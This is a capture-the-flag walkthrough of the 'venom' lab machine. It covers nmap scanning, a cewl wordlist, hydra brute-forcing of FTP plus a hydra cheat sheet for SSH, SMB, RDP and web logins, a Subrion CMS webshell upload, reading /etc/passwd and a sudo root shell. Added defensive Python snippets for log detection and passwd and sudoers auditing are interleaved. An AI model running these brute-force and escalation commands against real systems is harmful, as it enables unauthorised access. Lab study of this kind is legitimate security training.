venom

Information gathering

Scan the subnet

nmap -sn 192.168.244.0/24

Detect live hosts only, skipping the port scan.

┌──(ma5k㉿localhost)-[~]
└─$ nmap -sn 192.168.244.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:31 CST
Nmap scan report for localhost (192.168.244.85)
Host is up (0.00038s latency).
MAC Address: 00:0C:29:49:F0:E7 (VMware)
Nmap scan report for localhost (192.168.244.105)
Host is up (0.0042s latency).
MAC Address: D2:E8:87:FB:35:B2 (Unknown)
Nmap scan report for localhost (192.168.244.152)
Host is up (0.00018s latency).
MAC Address: AC:19:8E:9B:57:53 (Intel Corporate)
Nmap scan report for localhost (192.168.244.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds

Target IP: 192.168.244.85

nmap -p- -sV -sT -O 192.168.244.85

-p-: all 65535 TCP ports; -sV: service version detection

-sT: full TCP three-way handshake (SYN → SYN/ACK → ACK)

-O: OS fingerprinting (OS detection)

┌──(ma5k㉿localhost)-[~]
└─$ nmap -p- -sV -sT -O 192.168.244.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:35 CST
Nmap scan report for localhost (192.168.244.85)
Host is up (0.00051s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open http Apache httpd 2.4.29
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:49:F0:E7 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Hosts: VENOM, 127.0.1.1; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds

http

Start with HTTP: the site shows the stock Apache default page.

Routine directory scan: dirb http://192.168.244.85/

Nothing found there, so inspect the page source, which contains this string:

5f2a66f947fa5690c26506f66bde5c23

┌──(ma5k㉿localhost)-[~]
└─$ hashid 5f2a66f947fa5690c26506f66bde5c23
Analyzing '5f2a66f947fa5690c26506f66bde5c23'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x

hostinger

ftp

ftp 192.168.244.85

cewl (Custom Word List generator) is an open-source information-gathering tool that crawls a target website and builds a custom password wordlist from its content.

hydra (full name THC-Hydra) is a fast, flexible, multi-protocol network login brute-forcing tool developed by The Hacker's Choice (THC), widely used for credential-guessing attacks in penetration tests.


Aside: usage examples

cewl -d 4 -m 4 -e -a --meta_file meta.txt \
-H "User-Agent: CustomBot" \
http://target.local \
-w target_wordlist.txt

Option by option (inline "\ # comment" annotations are not valid shell, so the explanation is listed separately):

-d 4: crawl depth 4 (follow at most 4 levels of links from the start page)
-m 4: only keep words of length ≥ 4 characters (filters out short, meaningless words)
-e: also extract e-mail addresses (e.g. user@target.local)
-a: also extract metadata (author, description and other <meta> tag content)
--meta_file meta.txt: write the extracted metadata to a separate file, meta.txt
-H "User-Agent: CustomBot": custom HTTP request header, here setting User-Agent to "CustomBot"
http://target.local: the target URL (starting point of the crawl)
-w target_wordlist.txt: write the generated wordlist to target_wordlist.txt
hydra -t <threads> (parallel tasks), -vV (verbose, show every attempt)

# ftp
hydra -L user.txt -P pass.txt -t 4 -vV -o ftp_result.txt 192.168.1.10 ftp

# ssh
hydra -L user.txt -P pass.txt -t 4 -vV -o ssh_result.txt ssh://192.168.1.10
# non-default port (e.g. 2222)
hydra -L user.txt -P pass.txt -s 2222 -t 4 ssh://192.168.1.10

# telnet
hydra -L user.txt -P pass.txt -t 2 -vV telnet://192.168.1.10

# mysql
hydra -L user.txt -P pass.txt -t 4 mysql://192.168.1.10

# postgresql
hydra -L user.txt -P pass.txt -t 4 postgres://192.168.1.10

# smb (Windows shares / NetBIOS)
hydra -L user.txt -P pass.txt -t 4 -vV smb://192.168.1.10

# rdp (Remote Desktop)
hydra -L user.txt -P pass.txt -t 2 rdp://192.168.1.10

# redis
hydra -P pass.txt redis://192.168.1.10
# Redis usually has no username, so only the password is guessed

Web form login brute-forcing

# Generic format:
hydra -l <USER> -P <PASS_FILE> <IP> http-post-form \
"/login_path:param_user=^USER^&param_pass=^PASS^:<failure string>"

# Generic web login
hydra -l admin -P pass.txt 192.168.1.10 http-post-form \
"/login.php:username=^USER^&password=^PASS^:Invalid credentials"

# WordPress admin
hydra -l admin -P pass.txt 192.168.1.10 http-post-form \
"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect"

# With a Cookie and extra headers
hydra -l test -P pass.txt 192.168.1.10 http-post-form \
"/auth:email=^USER^&passwd=^PASS^:F=Login failed" \
-H "User-Agent: Mozilla/5.0" \
-H "Cookie: sessionid=abc123"

cewl http://192.168.244.85 -w passwd.txt

hydra -l hostinger -P passwd.txt -t 5 -vV -o success.txt -e ns 192.168.244.85 ftp

The password is recovered; log in:

hostinger / hostinger

lftp ftp://hostinger:hostinger@192.168.244.85
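On the server side, a run like the hydra command above does not go unnoticed: vsftpd writes one FAIL LOGIN line per attempt to its log, so a burst of failures from one client followed by an OK LOGIN is the signature to alert on. The following is an added example for the defender's side, not code from the post; the log lines are constructed in vsftpd's default log format, and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed vsftpd.log excerpt (not from the post): six failures from one
# client inside a few seconds, then a success; a second client fails once and
# then logs in normally a little later.
SAMPLE_LOG = """\
Sun Nov 23 18:40:01 2025 [pid 2] CONNECT: Client "192.168.244.3"
Sun Nov 23 18:40:01 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:01 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:02 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:02 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:03 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:03 2025 [pid 1] [hostinger] FAIL LOGIN: Client "192.168.244.3"
Sun Nov 23 18:40:04 2025 [pid 1] [hostinger] OK LOGIN: Client "192.168.244.3"
Sun Nov 23 19:02:10 2025 [pid 3] [hostinger] FAIL LOGIN: Client "192.168.244.105"
Sun Nov 23 19:02:25 2025 [pid 3] [hostinger] OK LOGIN: Client "192.168.244.105"
"""

# One vsftpd.log line: ctime-style timestamp, pid, optional [user], event, client IP.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?'
    r'(?P<event>FAIL LOGIN|OK LOGIN|CONNECT): Client "(?P<ip>[^"]+)"$'
)


def parse_line(line):
    """Return (timestamp, user, event, ip) or None for lines we do not model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return ts, m["user"], m["event"], m["ip"]


def flag_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold FAIL LOGIN events inside any sliding
    window, and note whether the same client later logged in successfully
    (a failure burst followed by success is the case to investigate first)."""
    failures = defaultdict(list)
    succeeded = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, _user, event, ip = rec
        if event == "FAIL LOGIN":
            failures[ip].append(ts)
        elif event == "OK LOGIN":
            succeeded.add(ip)

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it fits within `window`.
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = {"failures": best, "followed_by_success": ip in succeeded}
    return alerts


if __name__ == "__main__":
    for ip, info in flag_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

Run against a real /var/log/vsftpd.log the same loop works unchanged; the one client that fails once and succeeds fifteen seconds later is deliberately left below the threshold so the rule does not fire on an ordinary typo.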

Decryption

lftp hostinger@192.168.244.85:/> ls -hail
dr-xr-xr-x 3 65534 65534 4096 May 20 2021 .
dr-xr-xr-x 3 65534 65534 4096 May 20 2021 ..
drwxr-xr-x 2 1002 1002 4096 May 21 2021 files

lftp hostinger@192.168.244.85:/files> cat hint.txt
Hey there...

T0D0 --

* You need to follow the 'hostinger'
on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=
also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password


Have fun .. :)

e.g. echo "…" | base64 -d

The file can also be downloaded: get hint.txt

Mixed multi-layer Base decoding:
[decoded 3 times] Base64 -> Base64 -> Base64
Result: standard vigenere cipher

┌──(ma5k㉿localhost)-[~]
└─$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d
https://cryptii.com/pipes/vigenere-cipher

Vigenère cipher, key: hostinger

Plaintext: HELLO
Key: KEY → repeated cyclically to KEYKE
Encryption: H+K, E+E, L+Y, L+K, O+E → ciphertext

E7r9t8@Q#h%Hy+M1234
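The password in hint.txt is mixed-case and full of digits and symbols, so the detail that decides whether the decryption works is how non-letters are treated: in the standard Vigenère the post relies on, letters are shifted (case preserved) and every other character passes through without consuming a key letter. The following is an added example, not code from the post, implementing exactly that convention; it reproduces both the HELLO/KEY illustration above and the hostinger decryption.

```python
import string

ALPHABET = string.ascii_uppercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Standard Vigenère cipher.

    Letters are shifted by the corresponding key letter and keep their case;
    digits, punctuation and whitespace pass through unchanged and do not
    advance the key position (the convention the hint's password requires).
    """
    if not key or not all(c.isalpha() for c in key):
        raise ValueError("key must be non-empty and alphabetic")
    key = key.upper()
    out = []
    key_pos = 0
    for ch in text:
        if not (ch.isascii() and ch.isalpha()):
            out.append(ch)
            continue
        shift = ALPHABET.index(key[key_pos % len(key)])
        key_pos += 1
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + shift) % 26 + base))
    return "".join(out)


# Strings from hint.txt above (ciphertext) and the post's result (plaintext).
HINT_CIPHERTEXT = "L7f9l8@J#p%Ue+Q1234"
HINT_KEY = "hostinger"

if __name__ == "__main__":
    print(vigenere("HELLO", "KEY"))                           # the page's toy example
    print(vigenere(HINT_CIPHERTEXT, HINT_KEY, decrypt=True))  # the dora password
```

If a tool instead advances the key on every character, the same input decrypts to garbage; that is the usual reason an online decoder "does not work" on passwords like this one.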

venom.box

The hint says: try on venom.box

At first this made no sense to me. Putting the pieces together: the target IP is known and a password has been recovered, but the site cannot be reached usefully by IP; since this is Apache (or Nginx) with name-based hosting, the answer is to configure access by domain name.

"The web server recognises you by the Host header; an IP address has no 'name', so the request is turned away (served the default site)."

Open notepad.exe as administrator and edit:

C:\Windows\System32\drivers\etc\hosts

192.168.244.85 venom.box

Flush the DNS cache and verify:

ipconfig /flushdns, then ping / nslookup venom.box
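Why the hosts-file trick works is clearer from the server side. The fragment below is an added illustration of an Apache name-based virtual host layout, not the configuration of the venom box (which the post never shows); the ServerName of the default site and the DocumentRoot values are assumptions chosen to match the paths seen later in the post.

```apache
# First vhost = default: Apache serves this for any request whose Host header
# matches no other vhost, e.g. http://192.168.244.85/ -> stock Apache page.
<VirtualHost *:80>
    ServerName default.invalid      # placeholder name, assumed
    DocumentRoot /var/www/html
</VirtualHost>

# Name-based vhost: selected only when the request carries "Host: venom.box".
<VirtualHost *:80>
    ServerName venom.box
    DocumentRoot /var/www/html/subrion   # assumed; matches the listing shown later
</VirtualHost>
```

The hosts-file entry only changes what name the browser puts in the Host header; the server's IP and listening port are the same in both cases. From a defender's view this is also why a default vhost that exposes nothing useful is a sensible baseline: requests that arrive by bare IP or by a guessed name land there.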

Routine directory brute-forcing again: python .\dirsearch.py -u http://venom.box/ -o rs.txt

CVE-2018-19422 (file upload vulnerability in Subrion CMS 4.2.1)

An upload page: http://venom.box/panel/uploads/

Brute-force the username

dora / E7r9t8@Q#h%Hy+M1234

Upload a webshell

Post-exploitation

Into the admin panel, continuing with Subrion

/var/www/html/subrion/uploads/ >ls -hail

total 32K
538489 drwxr-xr-x 4 www-data www-data 4.0K Nov 24 15:47 .
1190802 drwxr-xr-x 13 www-data www-data 4.0K May 21 2021 ..
538490 -rwxr-xr-x 1 www-data www-data 656 Jun 14 2018 .htaccess
538784 drwxr-xr-x 2 www-data www-data 4.0K May 20 2021 .quarantine
538783 drwxrwxrwx 2 www-data www-data 4.0K May 20 2021 .tmb
526453 -rw-r--r-- 1 www-data www-data 29 Nov 24 15:35 1.php
536773 -rw-r--r-- 1 www-data www-data 30 Nov 24 15:47 gsl.phar
526454 -rw-r--r-- 1 www-data www-data 35 Nov 24 15:40 system.pht

/var/www/html/subrion >ls -hail

total 180K
1190802 drwxr-xr-x 13 www-data www-data 4.0K May 21 2021 .
1190429 drwxr-xr-x 3 root root 4.0K May 20 2021 ..
1191377 -rwxr-xr-x 1 www-data www-data 247 Jun 14 2018 .gitignore
1191378 -rwxr-xr-x 1 www-data www-data 2.3K Jun 14 2018 .htaccess
1191381 -rwxr-xr-x 1 www-data www-data 4.0K Jun 14 2018 CONTRIBUTING.md
1191385 -rwxr-xr-x 1 www-data www-data 4.7K Jun 14 2018 README.md
1190843 drwxr-xr-x 3 www-data www-data 4.0K May 20 2021 admin
1191155 drwxr-xr-x 2 www-data www-data 4.0K May 21 2021 backup
1191379 -rwxr-xr-x 1 www-data www-data 49K Jun 14 2018 changelog.txt
1191380 -rwxr-xr-x 1 www-data www-data 694 Jun 14 2018 composer.json
1191382 -rwxr-xr-x 1 www-data www-data 1.2K Jun 14 2018 favicon.ico
1191157 drwxr-xr-x 2 www-data www-data 4.0K Jun 14 2018 front
1191173 drwxr-xr-x 17 www-data www-data 4.0K May 20 2021 includes
1191383 -rwxr-xr-x 1 www-data www-data 4.1K Jun 14 2018 index.php
1191348 drwxr-xr-x 6 www-data www-data 4.0K Jun 14 2018 install
411391 drwxr-xr-x 13 www-data www-data 4.0K Jun 14 2018 js
1191384 -rwxr-xr-x 1 www-data www-data 35K Jun 14 2018 license.txt
411392 drwxr-xr-x 5 www-data www-data 4.0K Jun 14 2018 modules
1191386 -rwxr-xr-x 1 www-data www-data 41 May 21 2021 robots.txt
411470 drwxr-xr-x 4 www-data www-data 4.0K Jun 14 2018 templates
538485 drwxr-xr-x 7 www-data www-data 4.0K May 20 2021 tmp
538487 drwxr-xr-x 2 www-data www-data 4.0K Jun 14 2018 updates
538489 drwxr-xr-x 4 www-data www-data 4.0K Nov 24 15:47 uploads

Noticed the backup directory and the .htaccess file:

allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

/etc/passwd is a key system file on Unix and Unix-like systems (such as Linux) that stores basic user account information. Despite the name "passwd", on modern systems it does not hold the passwords themselves (those normally live in /etc/shadow, readable only by root).

At this stage it is usually about moving between users, privilege escalation, and permission issues.

Found nathan:

geoclue:x:118:122::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:119:123:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false

nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash

vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:123:128:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash
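Reading /etc/passwd by eye works for a ten-line excerpt; on a real host the questions a reviewer asks are "which accounts can actually log in", "is there a second UID 0" and "does any entry still carry a hash in the password field instead of x". The following is an added example, not code from the post, that parses the excerpt shown above and answers those three questions; the set of non-login shells is an assumption covering the common Debian/Ubuntu values.

```python
from dataclasses import dataclass

# The /etc/passwd excerpt shown above, reused as sample input.
PASSWD_EXCERPT = """\
geoclue:x:118:122::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:119:123:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:123:128:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash
"""

# Shells that deny an interactive login (assumed list, common on Debian/Ubuntu).
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str   # "x" means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) lines: seven colon-separated fields, blank lines ignored."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit(entries: list[PasswdEntry]) -> dict:
    """Three quick checks a reviewer runs over /etc/passwd."""
    return {
        # accounts that can get an interactive shell
        "interactive": [e.name for e in entries if e.shell not in NOLOGIN_SHELLS],
        # any UID 0 account that is not literally root
        "extra_uid0": [e.name for e in entries if e.uid == 0 and e.name != "root"],
        # password field holding something other than x/*/!/empty (a hash in passwd)
        "hash_in_passwd": [e.name for e in entries if e.passwd not in ("x", "*", "!", "")],
    }


if __name__ == "__main__":
    print(audit(parse_passwd(PASSWD_EXCERPT)))
```

On this excerpt only nathan and hostinger have a real shell, every password field is x, and no second UID 0 exists; it is precisely the short list of interactive users that makes the credential found in .htaccess worth trying against nathan.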

sudo /bin/bash starts a Bash shell directly as root.

sudo su first runs su (switch user) via sudo, which switches to root by default, and su then starts the shell.

su nathan
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
sudo -l

Matching Defaults entries for nathan on venom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
(root) ALL, !/bin/su
(root) ALL, !/bin/su

sudo /bin/bash

root@venom:/var/www/html/subrion/uploads# cd /root
root@venom:/root# ls -hail
total 64K
1177346 drwx------ 7 root root 4.0K May 21 2021 .
2 drwxr-xr-x 24 root root 4.0K May 20 2021 ..
1184378 -rw------- 1 root root 20K May 22 2021 .bash_history
1177363 -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
1177362 drwx------ 2 root root 4.0K Aug 7 2020 .cache
1190844 drwx------ 4 root root 4.0K May 21 2021 .config
1184238 drwx------ 3 root root 4.0K May 20 2021 .gnupg
1190291 drwxr-xr-x 3 root root 4.0K May 20 2021 .local
1190661 -rw------- 1 root root 201 May 20 2021 .mysql_history
1177364 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
1191636 -rw-r--r-- 1 root root 29 May 21 2021 root.txt
1191655 drwxr-xr-x 6 root root 4.0K May 21 2021 snap
root@venom:/root# cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.
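The sudoers rule "(root) ALL, !/bin/su" is the lesson of this box: a deny list layered on top of ALL is not a restriction, because any other allowed command (a shell, an editor, an interpreter) reaches the same result, and sudoers(5) itself warns that such negations are easily bypassed. The following is an added audit example, not code from the post, that parses the sudo -l output shown above and flags exactly this pattern; the regular expression for rule lines is an assumption that covers the usual "(runas) [TAG:] cmd, cmd" layout.

```python
import re

# `sudo -l` output from the session above, reused as sample input.
SUDO_L_OUTPUT = "\n".join([
    "Matching Defaults entries for nathan on venom:",
    "    env_reset, mail_badpass,",
    r"    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin",
    "",
    "User nathan may run the following commands on venom:",
    "    (root) ALL, !/bin/su",
    "    (root) ALL, !/bin/su",
])

# A command rule line: "(runas) [TAG: ...] cmd1, cmd2, !cmd3"  (assumed layout)
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> list[dict]:
    """Extract command rules from `sudo -l` output; Defaults lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append({
            "runas": m["runas"].strip(),
            "tags": m["tags"].strip(),
            "allow": [c for c in cmds if not c.startswith("!")],
            "deny": [c[1:] for c in cmds if c.startswith("!")],
        })
    return rules


def find_denylist_rules(rules: list[dict]) -> list[dict]:
    """Rules that grant ALL and then subtract specific commands.

    sudoers deny lists are not enforceable: with ALL still allowed, the user can
    reach the excluded program's effect through any other command, so these
    rules should be rewritten as an explicit allow list of the needed commands.
    """
    return [r for r in rules if "ALL" in r["allow"] and r["deny"]]


if __name__ == "__main__":
    for rule in find_denylist_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"ineffective deny list for runas={rule['runas']}: ALL minus {rule['deny']}")
```

The fix on the administrator's side is the mirror image of what the post does: list the few commands nathan actually needs instead of granting ALL and hoping an exclusion holds.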

Notes

Reproduced from: https://www.freebuf.com/defense/394169.html

The venom box feels a bit dated; the VM settings could not be changed, but it ran fine regardless. The box name is a nice touch, and the jump in difficulty compared with the first box is considerable.


venom
https://alenirving.github.io/2025/11/24/venom/
Author: Ma5k
License: CC-BY-NC-SA